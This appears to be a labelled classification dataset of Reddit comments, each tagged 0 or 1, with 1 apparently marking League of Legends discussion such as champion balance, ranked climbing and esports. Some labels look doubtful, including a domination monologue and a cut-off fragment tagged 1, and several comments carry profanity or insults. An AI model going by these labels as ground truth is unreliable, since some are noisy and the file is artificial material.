1	As a support main, I legitimately miss Season3. Sure we were dedicated ward-bots, but we had our own special niche. We controlled lane phase through naturally higher base damages, and we could carry mid and late game simply by providing vision where it was needed, a smart support only needs 6-8 wards to cover 85%(arbitrary but fairly accurate) of the map. We didn't have items with an overabundance of CDR and mana regen, and items geared towards supports were truly efficient.   Now we have very nice GP5 items, but aside from those we're reduced to either building the same AP items but on a much tighter budget, or wasting tons of gold efficiency buying the same stats over and over just to get that Mikael's/Locket active. Yes, it's easier to snowball into a damage carry as support now, but I always thought of support as the most "meta" position: less reliant on mechanics, but much more dependent on controlling the overall flow of the game through smarter item choices, through less ability spamming and more thoughtful use thereof.   Riot clearly wants to make all 5 positions equally desirable in SoloQueue, but I think the truth of the matter is that there are 4 real gold sources on the map: 3 lanes and a jungle. With 5 players, someone has to be missing out on gold, therefore items, and therefore scaling. That player, then, has to make the most use of their brains over their brawn. No, they won't be able to 1v1 anyone else on the enemy team, but through good management of their abilities and what limited actives they can afford, they generally provided more CC and anti-CC than the other 4 players.
0	My ex told me she wanted to be a stay at home mom.  I made enough that we could afford to do it. Since child care would be her entire check each month we opted for her staying at home.  Two months later she asks about getting a maid service because she is tired of cleaning the house.  Funny thing is, she was tired of cleaning our house, not the part time job she was doing cleaning other peoples houses on the weekend.   I made dinner 4-5 nights a week, she wanted a personal chef to take care of breakfast, lunch, and dinner.  Sex was non-existent.  She was diagnosed with depression, but since she was breast feeding she refused to take the meds.
0	This is nearly impossible.  First, most bank tellers see enough cash to spot obvious counterfeits and many banks have pens or black lights to help.  A typical branch might see 10-20 fake bills over the course of the year almost always one at a time and usually from merchant accounts.  Next, this would have gone out as 30 $100 bills and few bank tellers will have $3000 in hundreds in their own drawer, so the money would have come from the "day safe" or main vault.  The day safe (and some main safes) are counted out daily, so bundles of hundreds might get machine counted multiple times before going out to a customer.  The portable machines found at a branch are extremely accurate.  To ensure accuracy, most banks will be under contract for bi-annual service on the currency counters.  A branch might go years between seeing a single missed counterfeit bill.  Lastly, most branches are net consumers of large bills--branches take in small bills ($1-20) from customers and pay out large bills ($50 & $100) to customers.  Small bills get shipped out to a central vault and large bills are shipped in.  At the central vault the accuracy of machine counts jumps up a notch.  It's unheard of for a central vault to ship out counterfeit bills.   The only conceivable way for this to occur is for the teller to take in $3000 or more from some random transaction.  To avoid detection, the mythical counterfeiter probably wouldn't be an account holder.  This in itself is unlikely as some banks simply won't do business without an account.  Even among banks who do work with non-account holders, the mythical counterfeiter would face far greater scrutiny being a non-account holder.  Next, the teller would have to miss the counterfeits--not just a single bill, but 30+ of them.  Then, the teller would have to hold onto the fake bills without sending them to the day vault.  Tellers are strictly limited in the amount of cash they can hold.  A sudden influx of cash would likely trigger a transfer to the day vault and another count by a more experienced employee or a deposit in an automated locker with a machine count.  Lastly, the teller would have to hold onto all these fake bills without distributing them to anyone else, just waiting to spring them on the unsuspecting OP.
1	If you gave a free champion at level 1, people would make smurfs just to test out new champions, so level 1 is definitely out. Maybe after playing through the tutorial or getting to level 5. After all, people shouldn't even have an opinion on what champion to play until they've played some games. Free week champs are a good a place to start as any, especially since they purposely try to place more easily learnable champs in the rotation on average.   Some people have also mentioned that there's a listed "difficulty" for each champion, but most new players probably wouldn't notice that or would ignore that, and just pick the champion with the splash art they like the best since they know nothing about the game beyond that. Just look at OP's post; a new player playing Twitch would get mauled beyond belief.   From a business standpoint, it wouldn't be terrible. It would be great encouragement for new players to play up to XX level, since I'm guessing that low levels where smurfs and trolls are rampant are the most difficult to keep players through. Perhaps make 6300, maybe even 4800 champions off-limit to this rule to prevent a few extreme smurfs who want to try really expensive champs, but mainly so they don't lose out on too much RP spending possibility.
1	The pro's use champs like mundo and shyvana BECAUSE they are better than other champs.   They use champs like gragas simply because he is better than fizz karthus katarina.   Why? Because pro's dont care about riot, they care about winning and if winning means using the most broken champ available than that is what they do.   There is a certain meta because throughout the years this is the most effective way to win a game, thus pro's play it.   Its their job, its why they sign contracts, organisations dont want to sign and pay 5 people only to play "what they want and have fun".   Its business, its e-sports
1	Hi i am SteveSter and i am a casual plat player who mains Katarina top aiming for Diamond or masters playing Katarina top.   My goal in life is to try my best and make people's day by making them smile or laugh. I am super friendly and will help anybody in anyway i can by talking to anybody with personal problems or help anyone who wants to get better at league. I play ranked and normal usually chilling with my friends. I also stream tournaments as I enter them weekly Friday, Saturday, and Sunday starting 7 pm EST.   I have also started to coach people so if you want to learn anything please feel free to schedule lesson when im free!   I haven't been streaming often finding quite hard to stream when no one is watching but will be strongly motivated as more people come! When I do stream it is usually weekdays 11am - 6pm EST   one of my streams in a nutshell
0	I replied to a similar comment higher in this thread but no, there's no real evidence to suggest one is more complicated than the other.   You could probably make the case for healing a fracture versus re-shaping a cornea being reasonably similar but to grow either from scratch? The first person to figure that out in the real world is going to make a LOT of money. In fact, we haven't even come close to growing bone tissue synthetically (and the same could be said for the eye).
1	Is not this simpler? Is this not your natural state? It's the unspoken truth of humanity, that you crave subjugation. The bright lure of freedom diminishes your life's joy in a mad scramble for power, for identity. You were made to be ruled. In the end, you will always kneel.
1	BECAUSE HE KEPT FUCKING BULLYING THE MODS AND REDDIT USERS AFTER HIS FUCKING BAN. Holy shit, how do you not understand that?   RL was warned multiple times for his harassment of reddit users. He refused to fix it, his account gets banned. After being banned, he starts bullying the mods and creating drama non-related to the game on the sub. He also continued to harass users by linking reddit comments on his twitter for his followers to abuse the comment poster. He also used twitter to get upvotes for his posts, which is against reddit's rules. He even fucking threatened to release personal information of the mods.   How the hell is that hard to understand? Why should the mods continue to allow the prick to use this sub as an advertisement when he refuse to follow the rules of reddit? Actions have consequences, the only way to punish RL was to ban his shit as his account was already banned. Should the mods just let the guy bully reddit users who disagree with him on twitter? Should the mods just let the guy advertise his shit while he threatens to doxx them? Should the mods just let the guy continue to stir shit up that is unrelated to the actual game? RL fucked up, that was it. Its his fault that he is an insecure baby that cant just behavior according to the rules and accept that he dod something wrong.
1	Teammates doing poorly is irrelevant in 3 ways:   1) You can win lane, but if the enemy also wins their own lane, then the game depends on who can use their advantage to have the largest impact. You both won, but who won lane harder?   2) Winning lane can be completely irrelevant. Toplane Darius can be up 15 cs and a kill, but that's kinda poor for a lane bully. Meanwhile, Karthus being behind 20 cs and a kill against a Zed really means he's doing pretty well for himself. Scaling champions are often bad early, so losing lane is to be expected.   3) Teammates may affect how a single game turns out, but if you're constantly winning lane and losing game, its probably something you're doing.
1	Cass's Q has a 3-second cooldown; Morg's shield lasts 5 seconds, and has a 15-second cooldown. Until she get's nearly full CDR, Morg's shield will be down more than half of the time, and that window is wide enough for Cass to throw two Qs at her. Even while the shield is up, every Q after the first will deal damage through the shield. Also, I'm pretty sure that a reactive shield would not remove the poisoned condition, which means that Cass would be able to start wailing on you with E. Needless to say, every E would penetrate the shield.
1	I agree with pretty much everything you said, since it's pretty much all fact, haha, except for the part about Rammus. If Rammus is an issue, you want merc treads for the MR + Tenacity rather than Zephyr, especially since Zephyr doesn't provide any defensive stats and doesn't help much vs beef.   If you're going to build a Zephyr, it's likely going to be in combination with either Swifty Boots or Ninja Tabi, depending on what you're dealing with. If you want Zephyr specifically for the tenacity, I'd recommend going Ghostblade + Merc Treads instead since the avarice blade part of GB will help you to, slightly, catch up in gold and MR is pretty much always nice to have unless enemy team is all AD, in which case feel free to go Zephyr + Nin Tabs. In fact, Zephyr + Nin Tabs is perfectly fine to get AFTER Tri Force if the enemy team is all AD, in my opinion. And... actually I think I'm getting off topic. I'm sure no one cares that much about my opinion, so I'll stop here. :)
1	Because an ability (worst, an ultimate with a huge cd) that deals down to 5 damage is stupid. If you want to use your ultimate to finish someone, they should let you do it. It can deal less damage, whatever. Just not 5. Is Brand's ultimate supposed to be used 1v1 with no minion around, just as a finisher move? I doubt so. But do people still use it this way when they can? Of course they do. Because they can still rely on its damage somehow. It's less, sure, it's not in a teamfight, but flexibility is better. An ultimate shouldn't be used for only engaging. If you still have it at the end of the fight, or if it came back at the end of the fight, then fine you can use it and deal damage with it. If your ultimate as Malphite comes back at the end of a fight, and the last enemy champion flashes away with low HP, do you keep it and tell your allies "Dude, this is only an engage skill!". No, you freaking charge on this guy. Anyway this is getting pretty long.
1	yes except for the whole "you're tryndamere" thing   not only can they counterpick you in lane but they can pick something that is  vastly  more useful in a teamfight.   While you're busy AFK farming top because a laner that  isn't  stupid as fuck didn't push to your tower and instead just held the wave and denied you cs/exp, malphite jax riven lee sin (or whatever else) is off and about securing towers kills and dragons while you tell your team "gimme a sec im 3000 gold off IE then i can help u guys"   and then there's the whole issue that even if you are doing okay in farm you're really just an AD carry who can tank for an extra 3 seconds and has to be in melee range to auto attack which means you're not exactly useful when you consider that someone like Kayle does the exact same thing but also has utility and an invuln that does something more than make her annoying for a few extra seconds in a teamfight
1	If anything, Liquid's team play has not been good at all. Lot's of individual skill, and poor communication...and in the games it looks like the miscommunication is coming from the English speaking members of the team. The game against Gravity showed it. Dom, Quas, and Fenix played aggressively into a bursty dive comp while their comp is built for sustained damage and disengage. They had the late game, but played right into Gravity's hands. And while Piglet may be toxic ( I imagine its like old school Saint toxic) the shot calling and champ selects have not been good, nor are any kind of improvement from last season. And I don't think Piglet is the cause of that.
1	Well sorry, but i didnt want to read the whole post so i just read the
0	Not the best of wording on my behalf. I didn't mean consent is literally the same thing, but that the concept of being old enough to make your own choices and be your own person is the same sort of adult choices as consenting to sleep with someone.   My point is adulthood isn't easily definable. It's not age of majority or consent, or drinking, driving, or any other number chosen by any countries court.
0	My mom died of cancer about 3 years ago when I was 14. It was just me and her so it was my responsibility to call my extremely large family one by one to inform them. I asked them not to post on Facebook so I no one would have to find out that way. A friend of my mom's decided to go against my wishes and post on Facebook anyway. It was on my wall so I deleted it right away and messaged her saying I am sorry but I don't want it all over Facebook yet for my families sake. She got pissed off at me for politely telling her not to post about it for a day and told everyone that I was being ungrateful and other rude things.
1	Wow!  They somehow managed to nerf him yet again!   Let's see....   Passive:  Useless passive removed, but outrageous cooldowns only reduced slightly to make up for it (except Q).  Remember, his old cooldowns were balanced around his passive, so new Skarner  will  have higher effective cooldowns on W and E.  The new passive is basically the centerpiece of the kit allowing Skarner some semblance of his pre-nerf stickiness, but I'm not sure a .5-1 second stun is all that effective.  I've played a lot of Nautilus and that .5 second root he has is over before he can even hit them with his Riptide!  Annie's and Braum passive stuns start at 1.25 seconds and both of them are easier to use than melee Skarner's.  And the fastest way to get that sweet .5 second stun is to land a Q, land an autoattack to reduce Q's CD, land an E, land another Q, and follow up with another autoattack.  The best case scenario is probably 2-3 seconds of melee range combat to land a lousy .5 second stun.   Q: Nerfs across the board!  Half ratios and ~ 20% lower base damage.  His old passive effect is added to Q, so that is equivalent.  Extremely minor speed buffs added for the 1/500 fights where an extra 3% movement speed would make a difference.   W: 3 seconds knocked off cooldown, but that is just making up a bit for removing his old passive and will probably still have a longer cooldown than old Skarner.   E: Extremely heavy nerfs!  Half base damage, almost half AP ratio, and an insignificant 2 second decrease in CD to make up for it.   R: Finally a meaningful cooldown reduction.  The buff added to it (consuming stacks) is a small bonus I guess, but hardly meaningful.  It is just tacked on so he has another interaction with his stacking passive.
0	the letter of the law says if you send what is classified as child pornography to anyone, or every store it somewhere, you can be charged for possession of child porn.   so it really doesn't matter who they are, they broke the law. if the law is borked, change it, just ignoring it doesn't mean you are immune from the consequences of your actions.   when given questions like this, I deal with the letter of the law because they are what is exactly pertinent to the present conversation. I cant say that because I want pot to be legal I should be allowed to smoke it anyway, because its still against the law.   I tend to be a legal literalist (maybe being growing up as a foreigner in america made me have stricter respect for their rules). Society agrees on laws, you may not have personally, but at some point consensus was reached that society generally doesn't like child pornography, and thus put harsh restrictions on those who make/distribute it. I personally think the idea that you can be put into jail for taking a picture of yourself is a bit silly, but I can see where the strict logic kind of got in the way. since minors are not legally allowed to consent to naked pictures being taken of them, they are not allowed to give themselves consent to photograph themselves. the law is weird like that.   this is compounded by the fact that citizens have already been prosecuted for this.
1	A penta almost always kinda just changes the mood of the game into something a bit more fun, and to be fair if the enemy team gets a quadra, there's probably not much you can do.   So yea, contrary to the popular circlejerk, I think it's better to just give the penta. It makes one person feel good, generally makes the rest of the game friendlier, and metaphorically cockblocking someone's penta just makes you look like a douche.   There are very few 1v5 penta's. They're not really any way to measure a players skill. "Earning it" isn't really something you have to do.
1	I partially disagree with this statement. I am not going to say that you should bring Poppy into every high ELO game you play because you like her, but at the same time you do not have to play the current "OP" champs to be successful in Soloqueue.   I only have 80 wins in ranked atm so I am not a super experienced ranked player, however, I still am in Plat 2. Most of my top champions are not the FOTM or even considered OP. Xerath, my highest W/L is at an 80% with 20 wins 5 losses. Trundle 4/1 with 80%, Xin at 4/0 with 100%. These champs most people don't consider even moderately "OP" and yet I find it quite easy to carry most games with them.   I don't believe it changes too drastically as you climb ELO in terms of playing comfort champions, but because the skill cap increases you need to be weary of completely "UP" champions rather then playing "OP" ones.
1	Also, I should point out that while chinese forums tend to make fun of players in LoL, it's never intended to hurt the players' feelings. "Making fun" in chinese culture can be very different than that in western culture. Here, on reddit, if it's not clearly stated that it's just a "fun trashtalk thread", any bashing will be taken as toxic, poisonous insults.
1	Depends on the lane tbh. It might be more beneficial to build Cat on lanes like Karthus/Orianna/Swain/Morgana... because they are more based on sustaining in lane than killing opponents.   I go double dorans on most other AP champions, which are mostly more bursty orientated than the ones mentioned above. Like for example Fizz/Ahri/TF...
1	Well like some Riot dude said, China rapes with Ezreal so I'm pretty sure that it is due to a variance of play styles that NA doesn't prefer Ezreal over Vayne or Graves.   Ezreal is more of a kiting champ, and when 1 v 1 with another AD carry [for example, Vayne], I think if played well, you can win. You can use the E offensively and defensively at the same time, so while Vayne has faster movement speed, your E can allow you to gain more distance while doing damage, and then firing back a Q, thus doing more damage, and then a W and be ready to fight her as you've poked her down, all with auto attacks in between of course [never done it, just a theory]. In addition, Vayne needs Ezreal to be near a wall to stun him so by using E, you can re-position yourself, forcing her to use her E to push you back while you again use your Q, W, and auto attacks to kite her.   Unlike the current FOTM champs, Ezreal is not a straight up kill champ like Vayne, or someone who pretty much right clicks next to a tank like Graves. If anything, I wish Ezreal's E had some sort of cooldown reset like how Graves can auto attack to lower his escape/gap closer's cooldown and Tristana's rocket jump resets when she gets a kill or an assist. However, Ezreal Q DOES lower the cooldown of all his skills so perhaps it is fair.
0	Comcast (Business) tech/billing rep here. Don't get it twisted - it's not always that simple. Not all reps are so dumb that they'll give you a credit for a non-existent problem. Good reps actually check to see if an issue has been called in about before. If there's been a legit issue, yeah you might get some money. But unless the rep doesn't care or doesn't feel like dealing with some bullshit, you may not get a credit. This applies more towards business than Residential, as many Resi reps (esp. in Florida) seem to be half retarded/don't give a shit.   As far as what the one fella said about getting out of a contract if rates change, it's not always that simple either. For example, Comcast can change its equipment fee as it pleases (not that it happens often at all) and it doesn't exempt you from the contract. This isn't necessarily for Residential, but I would imagine similar rules apply. You won't see rate codes for say your TV package change unless your contract or any applicable promotions expire, or if you make a change to that service (that part kind of goes w/o saying)   If you really want to know what the company can and can't do, take some time to peruse the Terms and Conditions. I don't know about Residential or other companies but the Comcast Business T&C isn't terribly hard to go through. They also stay on top of that shit and have an archive of T&Cs as they're updated so frequently. What applies to one person who gets service two months before you won't necessarily be the same for you.
1	wtf are you idiots trashtalking a nice person who tries to help some people that maybe actually want his help and even if theyre on the same level like u suggested they can still learn from each other so stop trashtalking nice   guys in the league of legends community
1	That's entirely true! I went down to 900 or so elo once due to my dumbassery  and the climb wasn't that bad untill i hit 1200-1400. God  15% of the games were just so smooth and close and actually fun, the rest however was not. All of the rest were decided 10-12 mins in because someone failed flash, gave up first blood or something and everyone starts flaming them as hard as possible and rage quit or something and then i yell at them to stop trolling/flaming the 0/3/21 support and then they report me and i get banned.
1	Alliance did absolutely nothing wrong regardless of whether they were trying to humiliate CW or just trying to increase their fantasy points.   If this were anyone's fault (which it is not) it would be CW's fault for not just surrendering. Crying about being humiliated when you can just surrender is the most stupid shit.   And Riot saying they're "investigating" this is even worse. What are they going to do - fine Alliance for 'humiliating' CW? That would be stupid on so many levels. And where does it stop exactly? "You beat your opponent too hard, you will be fined for winning too easily!"
1	It has always amused me on how riot approaches nerfs. Which is nerfing a champion, which allowed another champion to thrive, then nerfing that champion, and so on in that loop. You would have figured by now they would realize that by nerfing every champion to the point that league is a giant wet noodle fight, it is ruining the game rather than balancing it.
1	Elo was never meant to work in the way it's implemented into solo queue. Elo in LoL really is just a number that tends to change more based on luck and having decent teammates, much more than it depends on your individual skill.
0	I work in produce at a grocery store, and part of the job is helping floral. I am a 20 year old guy in college, who knows absolutely nothing about flowers. I just blow up balloons. Yet, whenever someone has a question I always do my best to help them, usually Siri helps the most :D   But one day a woman came in and was very nice, and considerate to the fact that I didn't know alot. She needed an arrangement done right then, and with the Florist gone it was all up to me. I helped her make an arrangement (first one I ever did), and sent her on her way.   Fast forward two days, the lady comes back in and tells my manager to call me to the front. I'm used to getting complained on because some people don't like my kill them with kindness approach, and seeing the lady I assumed I did a shit job with the flowers. Turns out her 5 year old nephew had passed away and the flowers were for his funeral. Her sister had loved them, and the woman had come in to praise my good work, and good attitude towards her. Made my week.   Positive customer comments really makes all the difference
1	I started this season in Bronze 4 and am Now plat 4. And what I can tell you is that I've learned a lot from this experience of the climb. Let me share with you. There's 2 different ways to climb the ranked ladder. People do it by either going for objectives and just winning, or being mechanically skilled outplaying people and carrying. People have different play styles to win and find different ways to win. I play v.s diamond 5-2's quite a lot and can find not many differences between us other then the fact that they go for objectives more. The game is more about objectives and less about single mechanical skill now than it has ever been. Meaning it's pretty easy to climb the ladder with zero mechanics at all.
1	OGN is a league.  Winter, spring, and summer all give circuit points.   NLB factors into this as well, bringing the OGN teams that don't get to playoffs and amateur teams together for lesser circuit points.  It also functions as their promotion tourney.   LCS is a series of tournaments.  Spring was a tournament for a cash purse.  Summer is a tournament for cash+worlds spots.   In essence, Riot ran 6 tournaments each for NA and EU(spring promo, spring split, spring main, summer promo, summer split, summer final) There was no reward for splits other than seeds(top spots get better, bottom spots get none) due to them paying the 8 teams for games played rather than victory.   Confused?  OGN/NLB good.  LCS = Riot paying out of own pocket.   Maybe if Delta, Verizon, AT&T, Ralphs/Kroger, Nike, Adidas, Viacom, Expedia, GE, Coke(and too many more to list) started paying the player costs, while Red Bull put up the prize purse each season.
1	I don't have a way to reference the client right now but I feel safe guessing it's because then you wouldn't need to buy RP and everybody would have a bunch of champs for free.
1	Duoqueue makes it easier to lose actually, I was once placed with unranked people while me and a friend were on our promos 8)  I strongly disagree about the "losing streak = bad" argument, since many exceptional players and even former/current pros go on losing streaks (scarra, qtpie)  Yeah I agree that if you stomp your lane you have to snowball the other lanes as well but then you have to consider the avg win %. I was sitting at 59.8% win rate a week ago and I was always to my promos but then I got this nasty 9 game losing streak where my morale dropped significantly. Your win % just can't be higher than 60-65% in elo hell at least (bronze/silver/gold)
0	This is the same thing I've been wondering this whole time that Snowden has been going off the deep end. Even going back to the patriot act my life, freedom, and happiness have literally not been affected at all by the government keeping an eye on me and everyone else, which, as you say, has been a thing since way before this recent circlejerk has started. If anything I'd venture to say that these three things have been enhanced. Now days if some asshat with a Guy Fawkes mask starts lobbing grenades it my town's city hall while hollering, "FREEDOM," and thereby endangering my life, making me unhappy, and limiting my freedom to safely walk downtown, I can better trust that my government can find him based on the pictures the person took on his phone and uploaded to facebook of himself in the mask and holding a grenade with the message, "gonna blow up the government #revolution swag." And just as another note, if anyone posted pictures like that (and I've definitely seen people do that and worse) but then didn't actually become a terrorist, they would receive no government attention because there was no crime to investigate. As reddit has aptly demonstrated we are more than free to say whatever we want on the internet.
1	Here's a story of my most recent series. I hit 100 lp and then my 1st game has a Yasuo who ignores what positions our team calls. He proceeds to feed mid,  blame jungle and the top that he took mid from, then buy 5 mobility boots.   I win my next game, but my last one has a bickering bot lane who decide not to lane together after 1-2 deaths. Of course the solo adc gets stomped.   I work my way into series again. I win 1, my next game has a Diamond V Tf who ignored us calling our roles. He didn't listen to our pings, didn't call Mia when we asked him to, and didn't roam. We ended up losing because of the fed Kayle from his lane. He then blames us and refuses to group as we lose and ults into their team. My last game has Mundo who refuses to group. I said I'm in my series he replies with "I'M GONNA WIN GUYS" and runs solo into their team and dies. I told him wow I'm in my series it's not fair for you to do that to me on purpose. He replies with "Leagues not fair, deal with it" and feeds again.   Yea it makes me feel so excited to play promos...I work for 100 lp to drop to 82 lp because of people like this. I don't disagree that maybe I wasn't good enough to carry but its one thing to try and win with a bad player but another trying to win with an  intentional  feeder in a series.
1	In s3 / preseason i just started ranked. I got placed in bronze 3. I got really high mmr and only needed 2 more wins to a series for bronze 1. most of the players i played with were very cooperative and good sports. I think that the elo hell is everybody else with a bad mmr.
1	This probably sounds scummy and a bit ridiculous, but sometimes when there is a troll, you can bait a dodge.   Ex: Dude locks old eve 2nd pick because he is pissed he didn't get mid.  1st pick got mid.   You are 3rd pick - lock leblanc or some other champion that your team doesn't need and say "fuck this, so sick of trolls" or "fuck this, I'm afk." Put on useless summoners.  Chances are, someone else will dodge.  Wait until 3-1 seconds are left to see if they do. Worst case, you dodge and play ARAM.   I know its shitty and definitely not right to do, but I still think its better than having to wait 30 minutes because some asshole felt like trolling in the first place.
1	I don't mind the toxicity, I can just mute everyone if that's required. Ofcourse it makes it less fun, but I can cope with that. But the other things...   It's more of the game just moving forward too slow. The only thing changing is the meta, some new champs maybe, but mainly new skins. There has been some cool game modes like one-for-all which was really fun and silly, but then Riot decided that it's not popular enough to be kept on constantly. Why are they deciding what's "popular enough" when the players could decide that themselves if it's worth the longer queue times or not.   New game modes aren't even about anything super silly like capture-the-flag or hunting-teemo or something along these lines, something completely different. It's just SR with the possibility to play with a team with all having the same champ, SR with 6 players. Or HA with one player, HA with two players. Do they need a new game engine to actually make up something original, is the system really that broken?   I started playing ranked S4-preseason and was super excited for S4 to start so that I can begin my ladder struggle. Well the last three months have shown me that it's almost impossible for me to play ranked because when I have time to play the servers are down or are so unstable that it's no fun. Taking the hour for a ranked game just to find out that it's 4v5 just isn't fun. It feels unfair. I've spent the money and I've dedicated the time and now I don't even get to start mastering the competitive side of the game.   If all Riot get's done is visual updates and champion balancing then there must be a problem somewhere. Everyone else in the field is moving a lot faster and this might end up costing Riot as players slowly shift on to other games.
0	Please, karma is and account age is pointless.  I periodically start a new account.  Always cracks me up when someone tries to win an argument or support for his side by saying "account's only ## months old"  I was probably using Reddit more than a year before any one of these guys.
0	I've already seen this exact meme posted before... kinda surprised it still works.
0	Not a doctor or a nurse but was a switchboard operator for 5 years at a VA hospital and also worked the information desk at times. We once had a U.S. Marshall come in with a warrant for an individual who had been admitted but the person had declined to be registered on the patient directory. When this happens we are required to tell the person that we had no one by that name. If they insist that the person is there, we send them to the directors office (during the day or the Admin on duty at night) or in this case to hospital police.   The policy is set in stone but it's a bit different reading it on your test sheet and having a scary looking federal officer standing before you with a very official looking piece of paper. The guy working the desk told them where to find the guy, they went up and since he wasn't in any harm, they took him into custody right then.   Two days later, we get a call from the Marshal's office wanting to know how they found out he was there. Turns out our poor desk guy did a very bad thing and the bad guy was released due to HIPAA violations.   Desk guy retired from his job of 20 years before a serious inquiry could be set up and we all had to retrain in proper HIPAA etiquette along with more background investigations.
0	Since this is just a matter of opinion, I'll keep it short:   I said catalyzed them: Picard=Locutus kills Sisko's wife, Sisko hates Borg but also Picard and Federation and Life in general. Gets Commission he doesn't really like, then becomes Emissary and basically heals and grows over the series.   You may not care for the Borg, but I enjoy them and every other race in the show. Hell, I even enjoyed Species 8472 and all of the Xindus. Sure, some of the episodes are better than others, but I still enjoy them. I even admit to liking Enterprise (all the way down to the episode with the origin of Velcro).   Yes, I may be one of the fanboys that likes it regardless of how convoluted it may seem to other fans, but I'm not going to hate on people that don't enjoy it. It's how you perceive and watch the whole series that makes it either meaningful or otherwise to you.
0	A laptop actually stands up perfectly in my lap or on my bed. Tablets are always so awkward and uncomfortable to hold at an angle where you can read or interact with. The only place I actually prefer a tablet is on an airplane where the space is very cramped, otherwise a laptop is way more practical.
0	I think people new to seriously study history and look at exactly why slavery is the core issue here. Either that, or simply read the quote from the Confederate vice president literally saying the issue of slavery is the cornerstone of the new government.
1	I haven't seen him before C9 but I have always thought of him as really good.  But with C9's playstyle he has always felt like the guy who does the set necessary damage to win the fights.  This is really hard to explain like this but take Rekkles.  During Fnatic's losing streak I never said both Rekkles was over hyped.  When C9 rarely loses Sneaky goes down with the team just as hard.  Watching C9 games he rarely stands above his amazing team if ever.  Where Rekkles is easily the best player on Fnatic and proves it every time I see him play and only CandyPanda is close in EU to his equal.
0	I work with a guy with downs syndrome as a bag boy. We carry out groceries for people. Sure, he's my buddy and he's got my back, but I'm not going to lie, the guy's a little unstable. You joke with him, or not joke with him, pretty much at any given time a switch can go off and he will freak. He punched my boss in the stomach and tackled him to the ground for something reeeeally silly IIRC. I know it's not his fault, but come on, mentally challenged can also mean mentally unstable.
0	First of all, im going to apologize for my grammar.  I went through the same thing. I was living in Lake City, Ga when I was eighteen years old. I had just gone to pick up some bud from a connect, for a little bullshit amount like five grams. After that I was headed to a girls house to smoke her out and maybe get some nookie. While on the way, I stopped by the McDonalds with my friends for food, because, you know, pot. We walked in ordered our food and sat down. A few minutes later a few police officers walk in and they look like they are looking for someone. Whatever, I go back to my food. I get up to get a refill and the lady cop who was in the group sniffed me as I had walked past. She stops me and says," you stink. Have you been smoking weed, do you have any weed on you? Can I search you?" Before I could even muster a word my dumbass friend tells her, "I think that's a bit inappropriate, were trying to eat right now." She didn't like that, not one bit. But she left and we thought the worst was over. Were still eating for a little while, joking, blah, blah, blah. Then about fifteen minutes later another officer walked in and was approaching me, he announced himself and had informed me that they had a police dog that was ready to sniff. Being a scared eighteen year old with no prior record, they had me. I surrendered my weed and the officer thanked me for my cooperation and then proceeded to walk me outside. Low and behold, ladycop is standing right outside with cuffs. She asks, "why didn't you give it to me when I asked for it?" Please put your hands behind you back, you are going to jail tonight."   I sat in a jail cell for three days and a month later I had a court date. I was not allowed first offenders, even though I had never had a record. They played me like a fool because I was scared and ignorant to the situation.  I won't get into the other things that it had caused me, but it had ultimately ruined my life for the past few years. Police officers should be there to use better judgment, that's a reason they exist. Not to lock up anyone and everyone because they can.   Again, horrible at writing, sorry for that.
1	Yeah, the  >came closer to taking a series against SSB than any other team   really confused me. In the history of LoL the closest team to taking a series off them was always SSW in OGN, and finally SSW managed to do so in Worlds.   As for over more than one game looking "the best" against them...what? For anyone who has properly been following OGN, SSB ran a trolly comp they knew would would most likely not work for them. They were prepared for that. They ran an almost identical composition (difference in being AP Kog vs Jayce on dade) in the series against KT A and got absolutely crushed. They only dared to run such an experimental composition (to get some experience with more poke-y comps) against C9, a Western team, because they know it would never work for them in Korea.   Then you go on to Game 2 and 3 where C9 got absolutely rekt. Sure they had somewhat of a longer game length in comparison to SSW but that's just the nature of SSB's playstyle.   If you're going to argue about Game 4 being "close" then you have to watch the game again. The Game 4 was only "close" in the sole last moments where dade decided to go for his world-famous WC throws again. Getting caught out where he should not have been and baited three of his team members in. The game before that was still in SSB's favor and they were by that point in time poised to take the game down with another team fight due to their scaling having already surpassed SSB's (Maokai > Rumble, Rengar > Lee, Yasuo > Talon, Twitch > Corki, and Nami/Braum are both supports so it wouldn't matter). I must reiterate to you (and to /u/JuliaAndFriends) that it really wasn't a "close series", it was a "SSB systematic stomp with dade almost throwing one game".   Re-watch KT A vs SSB OGN summer final, Game 1 of this series, and Game 4 --- Game 2/3 are no doubtedly complete SSB stomps so don't bother. After scrutinizing these games will anyone be able to stop saying they were "close series" and realize SSB's strength in that series as much as anyone else. If you want to put the reason for a near 2-2 it wouldn't be anyone on C9 --- it'd be Dade's random and improper positioning and almost-throw. C9 was able to take Dade's mistake and attempt to capitalize on it, I'll give you that --- after all C9 certainly isn't brain-dead and has a degree of competence that no other NA team has shown thus far but to call them "close" to taking a series off SSB? No, just no.   At least, though, I can understand where the argument of C9 vs SSB being close stems from, despite how misled and deluded and fragile it is. What I find absolutely unbearable is any TSM fan saying "TSM did well against SSW" and that "Game 3 was TSM reverse-stomping". No, SSW attempted to style upon them in the most condescending way (with the one of the most lackluster, unintelligent draft phases the Korean scene has seen). TSM is still full of 5 people who can click around, and no matter the skill, the champions' power spikes cannot be ignored. When SSW didn't attempt to style they blazed through anyone in their way (besides SSB, their former pre-worlds OGN kryptonite they had to get over, but that's another discussion).
1	Remember to apply context to these changes as well. If your loss ratio has been catching up to your win ratio as of late you will notice a tilt in the direction of your ELO. Having a: 3 loss > 1 win > 3 loss > 2 win will tilt you closer towards heavy ELO losses and low ELO gains. The more winning streaks you have from now on the more gains you will have.   (If I am mistaken on this I am sure someone will correct me on it.)   Edit:  To add, seeing as you are getting more wins and losses you will notice slower and slower swings when it comes to your + - ratios. You SHOULD see a noticeable tilt when you win -considerably- more however.
0	Unfortunately it feels so much better and lasts so much longer. It was how I chose to keep myself focused in high school, I mean it feels so good that after even decades of sobriety you can still remember how good it felt, thats not good. It worked sure; but now I'm a recovering addict for the rest of my life.
